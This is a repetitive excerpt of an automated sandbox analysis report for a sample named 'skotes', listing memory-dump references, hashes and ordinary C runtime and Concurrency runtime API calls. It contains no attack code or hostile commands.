                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 512098550-0
                                                                                                                • Opcode ID: e312e72a36c5cbb077dfb3a6e2e507bb6853612486d11454138c8d237347fc8b
                                                                                                                • Instruction ID: 94800c437ae10582ffc925c25216bdd7611d59c5fbadb842552253ccba5f73b1
                                                                                                                • Opcode Fuzzy Hash: e312e72a36c5cbb077dfb3a6e2e507bb6853612486d11454138c8d237347fc8b
                                                                                                                • Instruction Fuzzy Hash: 70414F75A01619EFCF09DF68C458A6DB7B6FF89310F048259E506A7390CB78BE01CB91
                                                                                                                APIs
                                                                                                                • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 007AD344
                                                                                                                • ListArray.LIBCONCRT ref: 007AD367
                                                                                                                • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 007AD370
                                                                                                                • ListArray.LIBCONCRT ref: 007AD3A8
                                                                                                                • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 007AD3B3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                                • String ID:
                                                                                                                • API String ID: 4212520697-0
                                                                                                                • Opcode ID: 3b255fc7959bbe9b53a130020004c51fbf562f927d3e565af6ac185beb80d971
                                                                                                                • Instruction ID: 2dad6872f077dde395a963ec09bb0b27079cd4e2a2c77429c05b5b3e936a2eca
                                                                                                                • Opcode Fuzzy Hash: 3b255fc7959bbe9b53a130020004c51fbf562f927d3e565af6ac185beb80d971
                                                                                                                • Instruction Fuzzy Hash: 5831A135700210EFCB15DF54C888BADB7B6BFCA700F054299E8069B392DB78AD41CB92
                                                                                                                APIs
                                                                                                                • _SpinWait.LIBCONCRT ref: 007A86EE
                                                                                                                  • Part of subcall function 0079EAD0: _SpinWait.LIBCONCRT ref: 0079EAE8
                                                                                                                • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 007A8702
                                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 007A8734
                                                                                                                • List.LIBCMT ref: 007A87B7
                                                                                                                • List.LIBCMT ref: 007A87C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                • String ID:
                                                                                                                • API String ID: 3281396844-0
                                                                                                                • Opcode ID: 5aff07e516b13610491ff6c44116c966f1a8b0392d79c0e05ad8c1c88347c508
                                                                                                                • Instruction ID: 3df44d37ead1bdf2baa7359c4928e4a6b84ebb7a3c1fd3041028cd3d8f811ff1
                                                                                                                • Opcode Fuzzy Hash: 5aff07e516b13610491ff6c44116c966f1a8b0392d79c0e05ad8c1c88347c508
                                                                                                                • Instruction Fuzzy Hash: 1B31A932D01255DFCF54EFA4D5856ECBBB1BF86308F28026AD4027B252DB39AD04CB96
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __dosmaperr
                                                                                                                • String ID: H
                                                                                                                • API String ID: 2332233096-2852464175
                                                                                                                • Opcode ID: a08afef387794836ebaf6889ff82e49b53edecc035e46f279e0fbeaeb6935998
                                                                                                                • Instruction ID: 30c6b465febc89af56ed583a91d1900861f783ed1fd8858cefdc96ccab0b2f62
                                                                                                                • Opcode Fuzzy Hash: a08afef387794836ebaf6889ff82e49b53edecc035e46f279e0fbeaeb6935998
                                                                                                                • Instruction Fuzzy Hash: 9AA10632A041548FCF29DF68C895FAD3BA19F47320F1441ADE812AF392DB399D12CB61
                                                                                                                APIs
                                                                                                                • __Mtx_unlock.LIBCPMT ref: 0079A9D0
                                                                                                                • __Mtx_unlock.LIBCPMT ref: 0079A9ED
                                                                                                                  • Part of subcall function 00783380: __Cnd_broadcast.LIBCPMT ref: 007833CB
                                                                                                                  • Part of subcall function 00783380: __Mtx_unlock.LIBCPMT ref: 007833DF
                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 0079AA45
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 3354401312-768041998
                                                                                                                • Opcode ID: b26c64d66e6df04d09cac2fe462f0177e236f56c025732a3dd14db8162edebd0
                                                                                                                • Instruction ID: 39afe1ac8e468d5399748245fce1a8749a60191a26e7a14113e096f4ada8a419
                                                                                                                • Opcode Fuzzy Hash: b26c64d66e6df04d09cac2fe462f0177e236f56c025732a3dd14db8162edebd0
                                                                                                                • Instruction Fuzzy Hash: B3618DB0D02209DFDF14DFA4D548BAEBBB8FF04314F148169E805A7381DB39AA04CBA1
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
